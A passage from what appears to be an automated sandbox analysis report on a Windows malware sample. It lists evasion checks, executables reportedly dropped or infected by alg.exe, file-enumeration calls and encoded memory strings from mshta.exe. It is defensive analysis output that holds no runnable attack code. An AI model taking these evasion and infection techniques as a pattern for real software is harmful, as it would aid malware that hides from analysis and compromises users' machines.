                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Code function: 6_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 6_2_009952A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Code function: 7_2_022852A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_022852A0
                  Source: C:\Windows\System32\AppVClient.exe | Code function: 20_2_006B52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 20_2_006B52A0
                  Source: C:\Windows\System32\FXSSVC.exe | Code function: 23_2_008C52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 23_2_008C52A0
                  Source: C:\Windows\System32\msdtc.exe | Code function: 24_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 24_2_007252A0
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | API/Special instruction interceptor: Address: A87C1C
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | API/Special instruction interceptor: Address: D3807C
                  Source: C:\Users\user\AppData\Local\subpredicate\differences.exe | API/Special instruction interceptor: Address: CE8244
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Dropped PE file which has not been started: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Windows\System32\alg.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-110856
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\FXSSVC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\msdtc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI coverage: 4.8 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.2 %
                  Source: C:\Windows\System32\alg.exe TID: 7460Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\alg.exe TID: 7444Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\msdtc.exe TID: 7188Thread sleep count: 75 > 30
                  Source: C:\Windows\System32\alg.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0046445A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C6D1 FindFirstFileW,FindClose,1_2_0046C6D1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0046C75C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046EF95
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0046F0F2
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046F3F3
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_004637EF
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00463B12
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0046BCBC
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_004049A0
                  Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: mshta.exe, 00000000.00000003.1683026110.0000000008EE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1682380866.0000000008ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1685087255.0000000008F23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FrvI2pMfM@P1PsRKvGGobTa?hNwj&&fUa1vIL1qu70&&R/8/1lF4Q9SPzLkmP7ooR6RMQGYi6!!FBGf?nDNcSRNUFg6&&5/1mRHGfs9Ih&&9q5Zh2hjCoK7ztMw?sEl+6@l+zLcdkts6kssknQF9@?9Ijebd4?TgFQnQRFtBvj
                  Source: mshta.exe, 00000000.00000003.1708716715.0000000005FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jY6RTpqOqw6/ToHOyk7RDtdO247fDuGO4w7oDusO8470zvuO/M7FTwyPDg8QjxYPGs8gTyKP&&Y8oTzIPPk8ET0/PUQ9aT1+PYQ9jj2UPaQ9rD2yPcE9yz3RPe@96j3wPQI+FD4vPjU+UD5gPmk+cT6&&Ppw+oj6oPq8+uD69PsM+yz7QPtY+3j7jPuk+8T72Pvw+BD8&&Pw8/Fz8cPyI/Kj8vPzU/PT9CP0g/UD9!!P1s/Yz9oP24/dj97P4E/iT+OP5Q/nD+hP6c/rz+0P7o/wj/HP8w/1T/aP+@/6D/tP/M/+z8@o@I@+@@@@@@wBj@OMBMwGT@hMCYwLD@0MDkwPzBHMEwwUjBaMF8wZTBtMHIweDC@MIUwizCTM&&gwnjCmMKswsTC5ML4wxDDMMNEw1zDfMOQw6jDyMPcw/D@FMQoxEDEYMR4xLDE6MUgxTzFcM?UxhjGvMcIx0jERMikyMz&&PMlYy
                  Source: snmptrap.exe, 0000001D.00000002.2920979145.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUUP
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1738442951.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1764243449.000000000067B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: mshta.exe, 00000000.00000003.1708549207.0000000005FB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qNe81/jUsNlc2jjbENtc2ZzebN8I3DTg8OEQ4xDjxOCk5MTl6OZQ5yDnOOfc5EjoqOjY6RTpqOqw6/ToHOyk7RDtdO247fDuGO4w7oDusO8470zvuO/M7FTwyPDg8QjxYPGs8gTyKP&&Y8oTzIPPk8ET0/PUQ9aT1+PYQ9jj2UPaQ9rD2yPcE9yz3RPe@96j3wPQI+FD4vPjU+UD5gPmk+cT6&&Ppw+oj6oPq8+uD69PsM+yz7QPtY+3j7jPuk+8T72Pvw+BD8&&Pw8/Fz8cPyI/Kj8vPzU/PT9CP0g/UD9!!P1s/Yz9oP24/dj97P4E/iT+OP5Q/nD+hP6c/rz+0P7o/wj/HP8w/1T/aP+@/6D/tP/M/+z8@o@I@+@@@@@@wBj@OMBMwGT@hMCYwLD@0MDkwPzBHMEwwUjBaMF8wZTBtMHIweDC@MIUwizCTM&&gwnjCmMKswsTC5ML4wxDDMMNEw1zDfMOQw6jDyMPcw/D@FMQoxEDEYMR4xLDE6MUgxTzFcM?UxhjGvMcIx0jERMikyMz&&PMlYy
                  Source: mshta.exe, 00000000.00000003.1701795560.0000000005487000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1706859503.0000000005489000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FrvI2pMfM@P1PsRKvGGobTa?hNwj&&fUa1vIL1qu70&&R/8/1lF4Q9SPzLkmP7ooR6RMQGYi6!!FBGf?nDNcSRNUFg6&&5/1mRHGfs9Ih&&9q5Zh2hjCoK7ztMw?sEl+6@l+zLcdkts6kssknQF9@?9Ijebd4?TgFQnQRFtBv
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-108553
                  Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_1-108891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04EAF510 LdrInitializeThunk,5_2_04EAF510
